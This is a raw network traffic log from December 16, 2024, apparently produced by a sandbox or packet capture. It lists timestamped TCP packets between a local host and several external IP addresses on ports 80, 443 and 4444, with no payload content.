                                                                                                                                                                                              Dec 16, 2024 01:01:35.917968035 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918028116 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918456078 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918514967 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918598890 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918633938 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918648958 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918695927 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918853998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.918905973 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919306993 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919449091 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919492960 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919507980 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919538021 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919717073 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.919878006 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920185089 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920233011 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920314074 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920350075 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920361042 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920490026 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920595884 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.920666933 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921063900 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921113968 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921197891 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921232939 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921304941 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921446085 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921497107 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921931028 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.921984911 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922065020 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922101021 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922106028 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922285080 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922303915 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922364950 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922807932 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922935009 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.922970057 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923021078 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923218012 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923269987 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923683882 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923736095 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923804998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923841000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923856020 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.923890114 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924127102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924253941 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924546957 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924601078 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924669027 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924705982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924772978 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.924957037 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925117970 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925405025 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925559998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925595999 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925611973 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925637007 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925867081 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.925998926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926301003 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926347971 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926429987 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926465988 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926484108 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926647902 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926687956 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.926810026 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927170038 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927223921 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927292109 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927340031 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927345991 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927398920 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927566051 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.927614927 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928031921 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928083897 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928153038 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928189993 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928212881 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928338051 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928431034 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928478003 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928889990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.928946018 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929014921 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929050922 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929058075 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929097891 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929296970 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929352045 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929765940 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929819107 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929886103 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929923058 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929938078 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.929976940 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930181980 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930404902 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930613041 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930771112 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930805922 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.930866957 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931044102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931097031 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931503057 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931555986 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931631088 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931667089 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931682110 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931718111 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931879044 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.931927919 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101588964 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101629972 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101633072 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101677895 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101699114 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101722002 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101767063 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101825953 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101845026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101891994 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101947069 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.101989031 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102122068 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102135897 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102159977 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102183104 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102622986 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102709055 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102715969 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102752924 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102783918 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102798939 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102902889 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.102952003 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103506088 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103554964 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103609085 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103646040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103657961 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103691101 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103815079 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.103869915 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104448080 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104496002 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104504108 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104541063 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104552984 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104583025 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104639053 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.104686975 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105232000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105284929 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105330944 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105367899 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105400085 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105415106 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105549097 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.105597019 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.106048107 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.106097937 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.106152058 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.106242895 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:36.165352106 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.166539907 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.166555882 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.169646025 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.169734001 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.171417952 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.171509027 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.171614885 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.171623945 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.350408077 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.715173960 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.715353966 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:36.715749979 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.725744963 CET49835443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:36.725806952 CET44349835154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:37.331736088 CET498414444192.168.2.4185.157.162.216
                                                                                                                                                                                              Dec 16, 2024 01:01:37.452011108 CET444449841185.157.162.216192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:37.452115059 CET498414444192.168.2.4185.157.162.216
                                                                                                                                                                                              Dec 16, 2024 01:01:37.452467918 CET498414444192.168.2.4185.157.162.216
                                                                                                                                                                                              Dec 16, 2024 01:01:37.572568893 CET444449841185.157.162.216192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:38.359863997 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:38.360168934 CET4984680192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:38.480010986 CET8049846185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:38.480092049 CET4984680192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:38.480228901 CET8049825185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:38.480279922 CET4982580192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:38.485145092 CET4984680192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:38.605612040 CET8049846185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.272051096 CET444449841185.157.162.216192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.293534994 CET498414444192.168.2.4185.157.162.216
                                                                                                                                                                                              Dec 16, 2024 01:01:39.414037943 CET444449841185.157.162.216192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.822947025 CET8049846185.215.113.43192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.823031902 CET4984680192.168.2.4185.215.113.43
                                                                                                                                                                                              Dec 16, 2024 01:01:39.825577974 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:39.826011896 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:39.946022987 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.946455002 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:39.946527958 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:39.946588039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:39.969263077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:39.973450899 CET444449841185.157.162.216192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:40.053361893 CET498414444192.168.2.4185.157.162.216
                                                                                                                                                                                              Dec 16, 2024 01:01:40.090137959 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:40.947467089 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:40.947546959 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:40.947657108 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:40.981847048 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:40.981916904 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288105965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288140059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288158894 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288207054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288207054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288307905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288326025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288369894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288655043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288671017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288687944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288705111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288723946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288724899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288724899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288762093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.288762093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.408493996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.408519983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.408590078 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.408590078 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.412285089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.413872004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.480237007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.480254889 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.480293036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.480336905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.484407902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.484435081 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.484486103 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.492765903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.492820978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.495920897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.495997906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.496047020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.504373074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.504398108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.504443884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.512696981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.512902021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.512963057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.521222115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.521250963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.521306038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.529551029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.529671907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.529730082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.538059950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.538075924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.538126945 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.546500921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.546536922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.546622038 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.554790020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.554902077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.554963112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.562855005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.563029051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.563092947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.600261927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.600327969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.672516108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.672540903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.672574997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.672615051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.674717903 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.674948931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.674998045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:41.678548098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.678565025 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:41.678600073 CET4984880192.168.2.431.41.244.11
